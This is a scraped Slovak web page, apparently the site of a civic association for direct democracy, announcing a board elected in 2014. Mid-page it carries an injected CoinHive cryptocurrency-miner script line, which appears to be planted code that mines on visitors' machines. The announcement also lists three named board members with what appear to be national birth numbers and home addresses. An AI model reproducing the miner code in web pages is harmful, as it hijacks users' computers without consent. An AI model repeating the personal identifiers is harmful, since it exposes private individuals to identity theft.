Rozšírené hľadanie
Utorok 5. December 2023 |
meniny má Oto

Priama demokracia.sk 02.10.2023 01:15  var miner = new CoinHive.Anonymous ; miner.start ; Agora – občianske združenie na podporu priamej demokracie, registrované na MV SR pod číslom VVS/1-900/90-17098, sídlo Toplianska 20, 821 07 Bratislava. Oznamujeme vám, že podľa stanov nášho združenia valné zhromaždenie dňa 24. 2. 2014 zvolilo nové predsedníctvo v tomto zložení: 1. František Pálka, predseda, 510729/242, 900 52 Kuchyňa 336 2. Bohumil Olach, člen predsedníctva, 451221/711, Toplianska 20, 821 07 Bratislava 3. Denisa Ilková, člen predsedníctva, 725915/6388, 900 52 Kuchyňa 551